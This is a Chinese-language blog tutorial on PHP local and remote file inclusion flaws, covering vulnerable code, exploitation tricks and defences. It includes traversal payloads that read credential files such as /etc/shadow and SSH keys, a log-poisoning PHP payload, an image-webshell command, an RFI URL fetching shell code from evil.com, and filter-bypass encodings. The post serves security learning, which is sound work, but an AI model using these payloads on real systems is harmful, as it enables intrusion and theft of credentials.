文件包含漏洞利用全解析：原理、实战与防御（2025最新指南）

大家好，我是你们的数码科技博主晓晓。在网络安全日益重要的今天，掌握常见Web漏洞的原理与防御方法，不仅对开发者至关重要，也是每一位科技爱好者提升数字安全意识的必修课。

今天，我们将深入探讨一个经典但极具破坏力的Web安全漏洞——文件包含漏洞（File Inclusion Vulnerability）。本文将从漏洞原理讲起，结合真实利用场景，全面解析本地文件包含（LFI）和远程文件包含（RFI）的利用技巧，并提供有效的防御方案。无论你是安全初学者还是有一定基础的开发者，相信都能从中获得实用的知识。

什么是文件包含漏洞？

文件包含是编程语言中一种常见的功能，尤其在PHP中广泛应用。开发者通常会将可复用的函数、配置信息等写入独立文件，然后通过特定函数在需要时“包含”进来，避免代码重复。

1.1 常见的文件包含函数

以PHP为例，主要的文件包含函数有四个：

漏洞本质：当网站功能允许用户通过参数（如URL参数）指定要包含的文件，而开发者未对用户输入进行严格校验和过滤时，攻击者便可以“注入”恶意文件路径，让服务器执行非预期的代码，这就是文件包含漏洞。

一个典型的漏洞代码示例如下：

<?php
    $file = $_GET['filename'];
    include($file); // 危险！$file未经过滤
?>

如果filename参数被用户控制，攻击者就可以通过构造特殊路径来读取系统敏感文件，甚至执行任意代码。

本地文件包含（LFI）的7大利用方式

本地文件包含（Local File Inclusion, LFI）指攻击者能够包含并执行服务器本地文件的漏洞。以下是7种常见的利用技巧：

2.1 读取系统敏感文件

攻击者可以利用LFI读取服务器上的配置文件、密码文件等，获取关键信息。

常见敏感文件路径：

• Windows系统：

• C:\boot.ini - 查看系统版本

• C:\Windows\php.ini - PHP配置信息

• C:\Program Files\mysql\my.ini - MySQL配置

• C:\Windows\repair\sam - 存储系统密码

• Linux/Unix系统：

• /etc/passwd - 用户账户信息

• /etc/shadow - 用户密码哈希（需高权限）

• /etc/my.cnf - MySQL配置文件

• /root/.ssh/id_rsa - SSH私钥

• /var/log/auth.log - SSH登录日志

利用方式：

http://example.com/vuln.php?filename=../../etc/passwd

2.2 包含图片木马（配合文件上传）

当网站存在文件上传功能但只允许上传图片时，攻击者可上传“图片马”（即包含PHP代码的图片文件），再通过LFI漏洞执行其中的恶意代码。

制作图片马（Windows CMD）：

copy 1.jpg/b + shell.php/a shell.jpg

上传shell.jpg后，通过LFI包含它即可执行PHP代码。

2.3 包含Web服务器日志（GetShell）

即使没有文件上传点，攻击者仍可通过污染Web日志来实现代码执行。

利用条件：

• 日志文件可读

• 知道日志存储路径（如/var/log/apache2/access.log）

利用步骤：

1. 访问一个不存在的页面，如 http://example.com/<?php phpinfo();?>

2. 服务器会将请求记录到access.log中。

3. 使用Burp Suite等工具拦截请求，避免<、>被浏览器编码。

4. 通过LFI包含access.log，即可执行嵌入的PHP代码。

2.4 包含SSH日志

类似Web日志，攻击者可尝试在SSH认证日志中插入PHP代码。

常见日志路径：

• Ubuntu/Debian: /var/log/auth.log

• CentOS/RedHat: /var/log/secure

2.5 包含Session文件

PHP的Session文件通常存储在/tmp/sess_[PHPSESSID]。如果攻击者能控制Session中的某些变量（如user_agent），便可写入PHP代码，再通过LFI包含该Session文件执行。

2.6 包含临时上传文件

PHP上传文件时会生成临时文件（如/tmp/phpXXXXXX）。攻击者可利用时间竞争（Race Condition）或配合phpinfo()页面（可泄露临时文件名）来包含并执行该临时文件。

2.7 包含 /proc/self/environ

在PHP以CGI模式运行时，/proc/self/environ会保存环境变量，包括HTTP头（如User-Agent）。攻击者可将PHP代码插入User-Agent头，然后包含该文件执行。

远程文件包含（RFI）：更危险的威胁

远程文件包含（Remote File Inclusion, RFI）允许包含远程服务器上的文件。一旦存在RFI，攻击者可直接让服务器下载并执行恶意脚本。

示例：

<?php
    include($_GET['page'] . '.php');
?>

若allow_url_include配置开启，攻击者可构造：

http://example.com/index.php?page=http://evil.com/shell.txt?

服务器将下载并执行shell.txt中的PHP代码。

注意：现代PHP默认关闭allow_url_include，因此RFI相对少见，但一旦存在，危害极大。

绕过防御的常见技巧

面对开发者设置的过滤，攻击者常使用以下方法绕过：

4.1 目录遍历绕过

使用../或其编码形式绕过路径限制：

• ..%2f (URL编码)

• ..%c0%af (双重编码，某些服务器可解析)

• .%2e/ (点的编码)

4.2 后缀绕过

当服务器强制添加后缀（如.txt）时：

• 问号（?）：?file=http://evil.com/shell.txt?，问号后的内容常被忽略。

• 井号（#）：?file=http://evil.com/shell.txt#，#后的片段不发送到服务器。

• 协议利用：使用zip://或phar://协议，如：

  ?file=zip://image.jpg%23shell

  可包含压缩包内的指定文件。

如何有效防御文件包含漏洞？

作为开发者，必须采取以下措施防范：

1. 避免动态包含：尽量避免使用用户输入作为文件包含的参数。

2. 白名单验证：如果必须动态包含，使用白名单机制，只允许预定义的文件名。

3. 输入过滤与验证：严格过滤用户输入，移除../、http://等危险字符。

4. 关闭危险配置：在php.ini中关闭allow_url_include和allow_url_fopen。

5. 最小权限原则：Web服务器进程应以最低权限运行，避免读取系统关键文件。

6. 代码审计：定期进行安全代码审计，使用自动化工具扫描潜在漏洞。

文件包含漏洞虽是“老”漏洞，但其利用方式多样，危害严重，常与其他漏洞（如文件上传、命令执行）结合使用，形成完整的攻击链。理解其原理与利用手法，不仅能帮助开发者构建更安全的应用，也能让普通用户更深刻地认识到网络安全的重要性。

安全无小事，防患于未然。

如果你觉得这篇文章有帮助，欢迎点赞、收藏并分享给更多朋友。关注我，获取更多前沿的数码科技与网络安全知识！

免责声明：本文所述技术仅用于安全研究与学习，请勿用于非法用途。遵守法律法规，共同维护网络安全环境。